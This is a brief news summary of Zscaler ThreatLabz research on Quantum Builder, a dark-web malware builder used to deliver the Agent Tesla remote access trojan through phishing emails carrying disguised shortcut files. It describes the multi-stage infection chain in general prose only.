"Cyber Criminals Using Quantum Builder Sold on Dark Web to Deliver Agent Tesla Malware"

The Agent Tesla Remote Access Trojan (RAT) is being delivered using a recently discovered malware builder called Quantum Builder. When compared to previous campaigns, this one has more enhancements and a shift toward LNK (Windows shortcut) files, according to Zscaler ThreatLabz researchers Niraj Shivtarkar and Avinash Kumar. Quantum Builder is a customizable tool for generating malicious shortcut files as well as HTA, ISO, and PowerShell payloads to deliver next-stage malware, in this case, Agent Tesla, on the targeted machines. The multi-stage attack chain begins with spear-phishing, which includes a GZIP archive attachment containing a shortcut designed to execute PowerShell code responsible for launching a remote HTML application (HTA) via MSHTA. The phishing emails appear to be from a Chinese supplier of lump and rock sugar, with the LNK file masquerading as a PDF document. In turn, the HTA file decrypts and executes another PowerShell loader script, which is a downloader for retrieving and executing the Agent Tesla malware with administrative privileges. In a second variant of the infection sequence, the GZIP archive is replaced by a ZIP file, and additional obfuscation strategies are used to conceal the malicious activity. This article continues to discuss the cybercriminals delivering the Agent Tesla RAT using Quantum Builder. 

THN reports "Cyber Criminals Using Quantum Builder Sold on Dark Web to Deliver Agent Tesla Malware"